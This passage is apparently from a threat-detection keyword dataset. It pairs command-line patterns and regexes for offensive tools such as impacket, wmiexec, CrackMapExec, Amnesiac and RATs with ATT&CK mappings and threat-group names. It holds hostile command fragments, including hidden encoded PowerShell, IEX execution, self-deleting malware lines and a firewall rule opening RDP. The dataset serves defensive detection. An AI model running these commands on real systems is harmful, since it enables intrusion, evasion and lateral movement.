hacking/pentesting.WinRM (Windows Remote Management) is the Microsoft implementation of WS-Management Protocol. A standard SOAP based protocol that allows hardware and operating systems from different vendors to interoperate. Microsoft included it in their Operating Systems in order to make life easier to system administrators.This program can be used on any Microsoft Windows Servers with this feature enabled (usually at port 5985). of course only if you have credentials and permissions to use it. So we can say that it could be used in a post-exploitation hacking/pentesting phase. The purpose of this program is to provide nice and easy-to-use features for hacking. 
It can be used with legitimate purposes by system administrators as well but the most of its features are focused on hacking/pentesting stuff.","T1021 - T1028 - T1046 - T1078 - T1091 - T1219","TA0003 - TA0008 - TA0009","N/A","Turla","Exploitation tool","https://github.com/Hackplayers/evil-winrm","1","0","N/A","N/A","10","10","4804","626","2024-12-02T08:52:41Z","2019-05-28T10:53:00Z","38399" "*cmd /c ping localhost -n 1""*",".{0,1000}cmd\s\/c\sping\slocalhost\s\-n\s1\"".{0,1000}","offensive_tool_keyword","macro_pack","The macro_pack is a tool used to automatize obfuscation and generation of retro formats such as MS Office documents or VBS like format. Now it also handles various shortcuts formats.","T1587 - T1588 - T1027 - T1204 ","TA0005 - TA0002 - TA0008 - TA0011 - TA0042","N/A","Black Basta","Resource Development","https://github.com/sevagas/macro_pack","1","0","N/A","N/A","10","10","2241","412","2024-08-15T14:21:39Z","2017-10-03T18:30:06Z","38400" "*cmd /c powershell -windowst hidden *",".{0,1000}cmd\s\/c\spowershell\s\-windowst\shidden\s.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1059.001 - T1078 - T1086 - T1021.002 - T1046","TA0008 - TA0003 - TA0004 - TA0005 - TA0006 - TA0009 - TA0010 - TA0011","N/A","Black Basta","Framework","https://github.com/Leo4j/Amnesiac","1","0","N/A","typo","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","38401" "*cmd /c start https://github.com/trustedsec/specula/*",".{0,1000}cmd\s\/c\sstart\shttps\:\/\/github\.com\/trustedsec\/specula\/.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - 
TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","N/A","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","38406" "*cmd /c whoami* bypass*",".{0,1000}cmd\s\/c\swhoami.{0,1000}\sbypass.{0,1000}","offensive_tool_keyword","SharpToken","SharpToken is a tool for exploiting Token leaks. It can find leaked Tokens from all processes in the system and use them","T1134 - T1101 - T1214 - T1087 - T1038","TA0004 - TA0007","N/A","N/A","Exploitation tool","https://github.com/BeichenDream/SharpToken","1","0","N/A","N/A","N/A","5","467","66","2023-11-24T19:21:57Z","2022-06-30T07:34:57Z","38408" "*cmd smb *-u*-p*",".{0,1000}cmd\ssmb\s.{0,1000}\-u.{0,1000}\-p.{0,1000}","offensive_tool_keyword","crackmapexec","crackmapexec command lines. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002 - T1047","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater - ENERGETIC BEAR - EMBER BEAR - BERSERK BEAR - Black Basta","Credential Access","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","10","8690","1667","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z","38410" "*cmd.cat/chattr*",".{0,1000}cmd\.cat\/chattr.{0,1000}","offensive_tool_keyword","commando-vm","CommandoVM - a fully customizable Windows-based security distribution for penetration testing and red teaming.","T1059 - T1053 - T1055 - T1070","TA0002 - TA0004 - TA0008","N/A","N/A","Exploitation OS","https://github.com/mandiant/commando-vm","1","0","N/A","N/A","N/A","10","7168","1313","2024-09-24T19:14:18Z","2019-03-26T22:36:32Z","38413" "*cmd.exe /c 
""OK!""*",".{0,1000}cmd\.exe\s\/c\s\""OK!\"".{0,1000}","offensive_tool_keyword","Arbitrium-RAT","cross-platform fully undetectable remote access trojan to control Android Windows and Linux","T1059 - T1573.001 - T1027 - T1091 - T1486 - T1036 - T1560 - T1566 - T1480 - T1498 - T1113 - T1083 - T1016 - T1105 - T1056 - T1021 - T1112 - T1082 - T1072 - T1076 - T1078 - T1209 - T1003 - T1012 - T1100 - T1135 - T1108 - T1029 - T1547 - T1053 - T1060 - T1102 - T1124 - T1049 - T1123 - T1145 - T1210 - T1046 - T1010 - T1055","TA0040 - TA0010 - TA0005 - TA0011 - TA0043 - TA0006 - TA0042 - TA0008 - TA0009 - TA0007 - TA0002 - TA0003","N/A","N/A","Malware","https://github.com/im-hanzou/Arbitrium-RAT","1","0","N/A","N/A","10","4","355","309","2021-01-15T23:21:13Z","2021-01-16T03:03:11Z","38415" "*cmd.exe /c *echo test > C:\Users\Public\test.txt*",".{0,1000}cmd\.exe\s\/c\s.{0,1000}echo\stest\s\>\sC\:\\Users\\Public\\test\.txt.{0,1000}","offensive_tool_keyword","NimExec","Fileless Command Execution for Lateral Movement in Nim","T1021.006 - T1059.005 - T1564.001","TA0008 - TA0002 - TA0040","N/A","N/A","Exploitation tool","https://github.com/frkngksl/NimExec","1","0","N/A","N/A","N/A","4","372","38","2023-12-12T06:59:59Z","2023-04-21T19:46:53Z","38416" "*cmd.exe /c C:\\Windows\\DiskSnapShot.exe && echo --path C:\\Windows\\CCMCache\\cache*",".{0,1000}cmd\.exe\s\/c\sC\:\\\\Windows\\\\DiskSnapShot\.exe\s\&\&\secho\s\-\-path\sC\:\\\\Windows\\\\CCMCache\\\\cache.{0,1000}","offensive_tool_keyword","LatLoader","PoC module to demonstrate automated lateral movement with the Havoc C2 framework","T1570 - T1071 - T1021 - T1563 - T1105","TA0008 - TA0011 - TA0002 - TA0010","N/A","N/A","Lateral Movement","https://github.com/icyguider/LatLoader","1","0","N/A","N/A","9","4","301","35","2023-12-09T00:28:32Z","2023-10-06T15:03:17Z","38418" "*cmd.exe /c netsh advfirewall firewall add rule name=* protocol=TCP dir=in localport=3389 
action=allow*",".{0,1000}cmd\.exe\s\/c\snetsh\sadvfirewall\sfirewall\sadd\srule\sname\=.{0,1000}\sprotocol\=TCP\sdir\=in\slocalport\=3389\saction\=allow.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","38424" "*cmd.exe /c ping 0 -n 2 & del *",".{0,1000}cmd\.exe\s\/c\sping\s0\s\-n\s2\s\&\sdel\s.{0,1000}","offensive_tool_keyword","Lime-RAT","remote administration tool for Windows (RAT)","T1059 - T1573.001 - T1027 - T1091 - T1486 - T1036 - T1560 - T1566 - T1480 - T1498 - T1113 - T1083 - T1016 - T1105 - T1056 - T1021 - T1112 - T1082 - T1072 - T1076 - T1078 - T1209 - T1003 - T1012 - T1100 - T1135 - T1108 - T1029 - T1547 - T1053 - T1060 - T1102 - T1124 - T1049 - T1123 - T1145 - T1210 - T1046 - T1010 - T1055","TA0040 - TA0010 - TA0005 - TA0011 - TA0043 - TA0006 - TA0042 - TA0008 - TA0009 - TA0007 - TA0002 - TA0003","N/A","APT-C-36 - Operation Comando","Malware","https://github.com/NYAN-x-CAT/Lime-RAT","1","0","N/A","N/A","10","10","1086","413","2019-06-24T17:05:48Z","2018-02-07T15:35:56Z","38425" "*cmd.exe /c powershell -command ""Get-Service *chopper*",".{0,1000}cmd\.exe\s\/c\spowershell\s\-command\s\""Get\-Service\s.{0,1000}chopper.{0,1000}","offensive_tool_keyword","Tchopper","conduct Lateral Movement attack by leveraging unfiltered services display name to smuggle binaries as chunks into the target machine","T1021 - T1564","TA0008 - 
TA0005","N/A","N/A","Lateral Movement","https://github.com/lawrenceamer/Tchopper","1","0","N/A","N/A","9","1","54","7","2021-06-14T08:27:31Z","2021-06-08T15:51:14Z","38426" "*cmd.exe /c powershell.exe -enc $b64ClientScript*",".{0,1000}cmd\.exe\s\/c\spowershell\.exe\s\-enc\s\$b64ClientScript.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1059.001 - T1078 - T1086 - T1021.002 - T1046","TA0008 - TA0003 - TA0004 - TA0005 - TA0006 - TA0009 - TA0010 - TA0011","N/A","Black Basta","Framework","https://github.com/Leo4j/Amnesiac","1","0","N/A","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","38427" "*cmd.exe /c powershell.exe -enc $B64ServerScript*",".{0,1000}cmd\.exe\s\/c\spowershell\.exe\s\-enc\s\$B64ServerScript.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1059.001 - T1078 - T1086 - T1021.002 - T1046","TA0008 - TA0003 - TA0004 - TA0005 - TA0006 - TA0009 - TA0010 - TA0011","N/A","Black Basta","Framework","https://github.com/Leo4j/Amnesiac","1","0","N/A","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","38428" "*cmd.exe /c rundll32.exe agressor.dll*stealth*",".{0,1000}cmd\.exe\s\/c\srundll32\.exe\sagressor\.dll.{0,1000}stealth.{0,1000}","offensive_tool_keyword","mortar","red teaming evasion technique to defeat and divert detection and prevention of security products.Mortar Loader performs encryption and decryption of selected binary inside the memory streams and execute it directly with out writing any malicious indicator into the hard-drive. 
Mortar is able to bypass modern anti-virus products and advanced XDR solutions","T1055 - T1027 - T1036 - T1112 - T1037 - T1105 - T1059 - T1562","TA0002 - TA0003 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/0xsp-SRD/mortar","1","0","N/A","N/A","10","10","1451","235","2023-12-21T22:00:38Z","2021-11-25T16:49:47Z","38430" "*cmd.exe /c sc start plumber*",".{0,1000}cmd\.exe\s\/c\ssc\sstart\splumber.{0,1000}","offensive_tool_keyword","elevationstation","elevate to SYSTEM any way we can! Metasploit and PSEXEC getsystem alternative","T1548.002 - T1055 - T1574.002 - T1078.003","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/g3tsyst3m/elevationstation","1","0","N/A","N/A","N/A","4","368","45","2023-11-02T23:52:51Z","2023-06-10T03:30:59Z","38431" "*cmd.exe /C tasklist /m > C:\Windows\Temp\*.tmp 2>&1*",".{0,1000}cmd\.exe\s\/C\stasklist\s\/m\s\>\sC\:\\Windows\\Temp\\.{0,1000}\.tmp\s2\>\&1.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","N/A","observed with wmiexec.py","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","38434" "*cmd.exe /c timeout /t 5 & del /f /q *%s* & exit*",".{0,1000}cmd\.exe\s\/c\stimeout\s\/t\s5\s\&\sdel\s\/f\s\/q\s.{0,1000}\%s.{0,1000}\s\&\sexit.{0,1000}","offensive_tool_keyword","mars stealer","Self-removal 'mars stealer' command","T1587","TA0002","mars stealer","N/A","Malware","https://3xp0rt.com/posts/mars-stealer","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","38435" "*cmd.exe /c zoom1.msi*",".{0,1000}cmd\.exe\s\/c\szoom1\.msi.{0,1000}","offensive_tool_keyword","Zloader","Zloader Installs Remote Access Backdoors and Delivers Cobalt Strike","T1059 - T1220 - T1566.001 - T1059.005 - T1218.011 - T1562.001 - T1204","TA0002 - TA0008 - TA0006 - TA0001 - TA0010 - TA0003","N/A","N/A","Exploitation tool","https://news.sophos.com/en-us/2022/01/19/zloader-installs-remote-access-backdoors-and-delivers-cobalt-strike/","1","0","N/A","N/A","7","10","N/A","N/A","N/A","N/A","38437" "*cmd.exe /Q /c * 1> *\\127.0.0.1\ADMIN$\__* 2>&1*",".{0,1000}cmd\.exe\s\/Q\s\/c\s.{0,1000}\s1\>\s.{0,1000}\\\\127\.0\.0\.1\\ADMIN\$\\__.{0,1000}\s2\>\&1.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. 
Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","N/A","generic behavior of impacket command execution","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","38438" "*cmd.exe /Q /c *.bat *> \\127.0.0.1\ADMIN$\* 2&*",".{0,1000}cmd\.exe\s\/Q\s\/c\s.{0,1000}\.bat\s.{0,1000}\>\s\\\\127\.0\.0\.1\\ADMIN\$\\.{0,1000}\s2\&.{0,1000}","offensive_tool_keyword","wmiexec","wmiexec.py from impacket used by metasploit","T1021.005 - T1047 - T1059.001 - T1059.003 - T1059.005","TA0008 - TA0002 - TA0011","N/A","Dispossessor - HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound - DEV-0270 - MUSTANG PANDA","Lateral Movement","https://github.com/rapid7/metasploit-framework/blob/2722067108b5c034da9f77b95eaf1c1db33db4fa/modules/auxiliary/scanner/smb/impacket/wmiexec.py#L127","1","0","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","38439" "*cmd.exe /Q /c /start /min powershell.exe -nop -c*",".{0,1000}cmd\.exe\s\/Q\s\/c\s\/start\s\/min\spowershell\.exe\s\-nop\s\-c.{0,1000}","offensive_tool_keyword","wmiexec","wmiexec.py from impacket used by metasploit","T1021.005 - T1047 - T1059.001 - T1059.003 - T1059.005","TA0008 - TA0002 - TA0011","N/A","Dispossessor - HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 
- Sandworm Team - menuPass - Magic Hound - DEV-0270 - MUSTANG PANDA","Lateral Movement","https://github.com/rapid7/metasploit-framework/blob/2722067108b5c034da9f77b95eaf1c1db33db4fa/modules/auxiliary/scanner/smb/impacket/wmiexec.py#L127","1","0","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","38440" "*cmd.exe /Q /c cd 1> \\127.0.0.1\ADMIN$\_*>&1*",".{0,1000}cmd\.exe\s\/Q\s\/c\scd\s\s1\>\s\\\\127\.0\.0\.1\\ADMIN\$\\_.{0,1000}\>\&1.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","N/A","observed with wmiexec.py","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","38441" "*cmd.exe /Q /c cd \ 1> \\127.0.0.1\ADMIN$\__* 2>&1*",".{0,1000}cmd\.exe\s\/Q\s\/c\scd\s\\\s1\>\s\\\\127\.0\.0\.1\\ADMIN\$\\__.{0,1000}\s2\>\&1.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","N/A","https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/iran-apt-seedworm-africa-telecoms","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","38442" "*cmd.exe /Q /c dir 1> \\127.0.0.1\ADMIN$\_* 2>&1*",".{0,1000}cmd\.exe\s\/Q\s\/c\sdir\s1\>\s\\\\127\.0\.0\.1\\ADMIN\$\\_.{0,1000}\s2\>\&1.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","38444" "*cmd.exe /Q /c dir 1> \\localhost\ADMIN$\Temp\* 2>&1*",".{0,1000}cmd\.exe\s\/Q\s\/c\sdir\s1\>\s\\\\localhost\\ADMIN\$\\Temp\\.{0,1000}\s2\>\&1.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation 
tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","38445" "*cmd.exe /Q /c echo tasklist ^> \\127.0.0.1\C$\__*2^>^&1 > *",".{0,1000}cmd\.exe\s\/Q\s\/c\secho\stasklist\s\^\>\s\\\\127\.0\.0\.1\\C\$\\__.{0,1000}2\^\>\^\&1\s\>\s.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","N/A","observed with smbexec.py","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","38446" "*cmd.exe /Q /c hostname1> *\\127.0.0.1\ADMIN$\* 2>*",".{0,1000}cmd\.exe\s\/Q\s\/c\shostname1\>\s.{0,1000}\\\\127\.0\.0\.1\\ADMIN\$\\.{0,1000}\s2\>.{0,1000}","offensive_tool_keyword","wmiexec","wmiexec.py from impacket used by metasploit","T1021.005 - T1047 - T1059.001 - T1059.003 - T1059.005","TA0008 - TA0002 - TA0011","N/A","Dispossessor - HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound - DEV-0270 - MUSTANG PANDA","Lateral 
Movement","https://github.com/rapid7/metasploit-framework/blob/2722067108b5c034da9f77b95eaf1c1db33db4fa/modules/auxiliary/scanner/smb/impacket/wmiexec.py#L127","1","0","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","38449" "*cmd.exe /Q /c nslookup 1> *\\127.0.0.1\ADMIN$\* 2>*",".{0,1000}cmd\.exe\s\/Q\s\/c\snslookup\s1\>\s.{0,1000}\\\\127\.0\.0\.1\\ADMIN\$\\.{0,1000}\s2\>.{0,1000}","offensive_tool_keyword","wmiexec","wmiexec.py from impacket used by metasploit","T1021.005 - T1047 - T1059.001 - T1059.003 - T1059.005","TA0008 - TA0002 - TA0011","N/A","Dispossessor - HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound - DEV-0270 - MUSTANG PANDA","Lateral Movement","https://github.com/rapid7/metasploit-framework/blob/2722067108b5c034da9f77b95eaf1c1db33db4fa/modules/auxiliary/scanner/smb/impacket/wmiexec.py#L127","1","0","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","38452" "*cmd.exe /Q /c powershell.exe -exec bypass -noni -nop -w 1 -C *\temp*",".{0,1000}cmd\.exe\s\/Q\s\/c\spowershell\.exe\s\-exec\sbypass\s\-noni\s\-nop\s\-w\s1\s\-C\s.{0,1000}\\temp.{0,1000}","offensive_tool_keyword","powershell","likely associated with a PowerShell-based exploit kit such as PowerSploit or Empire","T1059.001 - T1059.003 - T1086 - T1027 - T1105 - T1059.005 - T1059.006 - T1059.007","TA0002 - TA0003 - TA0005 - TA0008 - TA0040","N/A","N/A","Defense Evasion","N/A","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","38453" "*cmd.exe /Q /c powershell.exe -nop -w -hidden -c*IEX*",".{0,1000}cmd\.exe\s\/Q\s\/c\spowershell\.exe\s\-nop\s\-w\s\-hidden\s\-c.{0,1000}IEX.{0,1000}","offensive_tool_keyword","wmiexec","wmiexec.py from impacket used by metasploit","T1021.005 - T1047 - T1059.001 - T1059.003 - T1059.005","TA0008 - TA0002 - TA0011","N/A","Dispossessor - HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound - DEV-0270 - MUSTANG PANDA","Lateral 
Movement","https://github.com/rapid7/metasploit-framework/blob/2722067108b5c034da9f77b95eaf1c1db33db4fa/modules/auxiliary/scanner/smb/impacket/wmiexec.py#L127","1","0","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","38454" "*cmd.exe /Q /c powershelll.exe 1> *\\127.0.0.1\ADMIN$\* 2>*",".{0,1000}cmd\.exe\s\/Q\s\/c\spowershelll\.exe\s1\>\s.{0,1000}\\\\127\.0\.0\.1\\ADMIN\$\\.{0,1000}\s2\>.{0,1000}","offensive_tool_keyword","wmiexec","wmiexec.py from impacket used by metasploit","T1021.005 - T1047 - T1059.001 - T1059.003 - T1059.005","TA0008 - TA0002 - TA0011","N/A","Dispossessor - HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound - DEV-0270 - MUSTANG PANDA","Lateral Movement","https://github.com/rapid7/metasploit-framework/blob/2722067108b5c034da9f77b95eaf1c1db33db4fa/modules/auxiliary/scanner/smb/impacket/wmiexec.py#L127","1","0","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","38455" "*cmd.exe /Q /c quser 1 > \\127.0.0.1\ADMIN$\*",".{0,1000}cmd\.exe\s\/Q\s\/c\squser\s1\s\>\s\\\\127\.0\.0\.1\\ADMIN\$\\.{0,1000}","offensive_tool_keyword","wmiexec","wmiexec.py from impacket used by metasploit","T1021.005 - T1047 - T1059.001 - T1059.003 - T1059.005","TA0008 - TA0002 - TA0011","N/A","Dispossessor - HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound - DEV-0270 - MUSTANG PANDA","Lateral Movement","https://github.com/rapid7/metasploit-framework/blob/2722067108b5c034da9f77b95eaf1c1db33db4fa/modules/auxiliary/scanner/smb/impacket/wmiexec.py#L127","1","0","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","38456" "*cmd.exe /Q /c start *stage1.exe 1*",".{0,1000}cmd\.exe\s\/Q\s\/c\sstart\s.{0,1000}stage1\.exe\s1.{0,1000}","offensive_tool_keyword","malware","Destructive Malware targeting organizations","T1486 - 
T1059","TA0008","N/A","N/A","Ransomware","https://www.microsoft.com/security/blog/2022/01/15/destructive-malware-targeting-ukrainian-organizations/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","38457" "*cmd.exe /Q /c whoami 1> \\127.0.0.1\ADMIN$\_*2>&1*",".{0,1000}cmd\.exe\s\/Q\s\/c\swhoami\s1\>\s\\\\127\.0\.0\.1\\ADMIN\$\\_.{0,1000}2\>\&1.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","N/A","observed with wmiexec.py","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","38458" "*cmd.exe' successfully created with LOGON_TYPE = 9*",".{0,1000}cmd\.exe\'\ssuccessfully\screated\swith\sLOGON_TYPE\s\=\s9.{0,1000}","offensive_tool_keyword","Rubeus","Run Rubeus via Rundll32 (potential application whitelisting bypass technique)","T1558.004 - T1098 - T1110.001 - T1555.003 - T1218.011 - T1085 - T1070.004","TA0005 - TA0002 - TA0006 - TA0008 - TA0009","N/A","Black Basta - Dispossessor - Conti - Diavol - Ryuk - Wizard Spider - APT29 - COZY BEAR","Credential Access","https://github.com/rvrsh3ll/Rubeus-Rundll32","1","0","#content","N/A","10","3","200","32","2020-04-25T19:55:27Z","2020-04-24T20:35:38Z","38459" "*cmd.exe"" /C 
